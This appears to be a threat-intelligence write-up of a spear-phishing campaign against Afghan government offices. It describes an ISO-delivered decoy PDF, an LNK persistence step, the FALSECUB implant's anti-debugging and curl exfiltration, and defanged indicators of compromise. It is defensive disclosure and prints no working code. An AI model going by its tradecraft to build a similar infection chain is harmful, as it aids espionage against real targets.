Security team published an analysis of an ongoing targeted spear-phishing campaign—Operation Nomad Leopard—designed to infiltrate government computers within Afghanistan. The operation leverages bespoke social-engineering techniques, container evasion, and a multi-stage malware chain to achieve initial access, persistence, and data exfiltration.
Campaign Overview
Operation Nomad Leopard is a regionally focused cyber-espionage operation directed at Afghan government ministries and administrative offices. The attackers use highly plausible decoy content and tailored social engineering to lure victims into executing malicious files.
Key characteristics include:
- Targets: Government ministry and administrative personnel in Afghanistan
- Primary vector: Spear-phishing with a malicious ISO file attachment
- Threat level: Targeted and persistent, though exhibiting operational mistakes
- Attribution: Individual or small cluster actor with regional interest and limited operational security (opsec) maturity
Infection Chain Breakdown
The core of this operation is a multi-stage infection chain that uses legitimate formats and tools to evade detection by security systems.
1. Initial Access: Malicious ISO Delivery
The attack begins when a target receives a file named Afghanistan Islami Emirates.iso. This ISO file is an archive format that Windows can mount as a virtual drive, allowing embedded content to run without inheriting typical web-based warnings like Mark-Of-The-Web flags, resulting in better evasion of email and endpoint filters.
Upon extraction, the ISO contains three files:
- doc.pdf: A decoy document designed to mimic an official Afghan government communication
- Doc.pdf.lnk: A malicious Windows shortcut that drives execution logic
- img.jpg: The final payload, disguised as an image but in reality a Windows executable
Decoy Document: Authenticity in Deception
The decoy doc.pdf is carefully crafted to resemble an authentic government notice. It is written in Pashto, bears official formatting, logos, reference numbers, and instructions that create urgency—pressuring recipients to interact with the file.
This psychological manipulation increases the chance of user execution, exemplifying how threat actors combine technical and social tactics.
Stage 2: The Malicious LNK File
The Doc.pdf.lnk file is not just a shortcut to open the PDF. It follows a precise workflow:
- Launch the decoy PDF so the victim sees a legitimate document.
- Copy the hidden payload (img.jpg) to the system directory at
C:\ProgramData\. - Create persistence by using the
mklinkcommand to hardlink the payload into the Windows Startup folder as searchmgr.exe. - Execute the implant using a silent start command.
By executing these steps, the LNK file ensures both stealthy execution and persistence across reboots—key elements for long-term access.
Stage 3: The FALSECUB Implant
The executable hidden as img.jpg is a bespoke malware tracked by SEQRITE as FALSECUB.
Technical Features of FALSECUB
- Compiled in C++ with anti-analysis measures
- Anti-debugging checks, including:
GetTickCount64to detect abnormal timingGlobalMemoryStatusExfor physical memory checksIsDebuggerPresentto detect debuggers
These routines complicate forensic analysis and sandbox detection.
Command & Control and Operations
Once initialized and passing anti-analysis checks, the implant attempts to connect to a hardcoded command-and-control (C2) address. If successfully connected, FALSECUB can receive commands that perform operations such as:
- Enumerating the infected system (user, computer, OS version)
- Enumerating connected drives
- Exfiltrating data via HTTP to the C2 server
- Uses a silent
curlcommand with custom HTTP headers - Uploads files from user directories like Desktop and Documents
- Uses a silent
Infrastructure and Attribution
FALSECUB attempts connections to multiple endpoints:
- IP 104[.]18[.]38[.]233 (Cloudflare)
- IP 207[.]244[.]230[.]94 running RDP
- Domain theepad0loc93x.ddns.net via dynamic DNS services
The malware infrastructure is hosted under ASN AS40021 (Contabo) and AS13335 (Cloudflare), indicating abuse of cloud hosting and dynamic DNS for easy pivoting.
A GitHub repository (user afghanking777000) hosted the malicious ISO—an operational mistake by the actor, as the account provided forensic clues about their activity patterns and interests, including posting real Afghan government documents. Content tied to this alias appeared linked to Pakistan via metadata and telemetry evidence, though attribution remains tentative.
Operational Security (OpSec) Observations
Despite careful lure design, the operator made several mistakes:
- Use of a public GitHub repository as a dropper
- Reuse of personas across platforms such as Pinterest and Scribd
- Upload timelines that revealed behavioral patterns
These weaknesses suggest a non-sophisticated threat actor or small group rather than a well-resourced state-level operation.
Conclusion
Operation Nomad Leopard demonstrates how targeted spear-phishing campaigns continue to evolve against government and strategic targets. The campaign combines:
- Highly convincing social engineering
- Evasion techniques via ISO containers
- A multi-stage infection process
- Custom malware with anti-analysis logic
Despite exhibiting moderate sophistication, operational mistakes gave defenders valuable forensic footholds. The campaign underscores the importance of layered defense, user education, and proactive threat hunting.
Technical Indicators (IOCs)
Hashes:
- ISO:
63f6c85fc16b346cc3f18da9380aee6ffbb3e735863e2e8f118f38737e0d1345 - LNK:
6c8936fea2fe9cbbcc6135941ac5fb6ea7819530a0914d8c0f39a015c0f2055d - EXE:
f817f65edbc77f7bbdd6e4f469e82c0e770b7e221bdb348f366a475a8a39242b
Network:
104[.]18[.]38[.]233207[.]244[.]230[.]94theepad0loc93x[.]ddns[.]net- TinyURL redirect:
hxxps://tinyurl[.]com/3hjb6f95
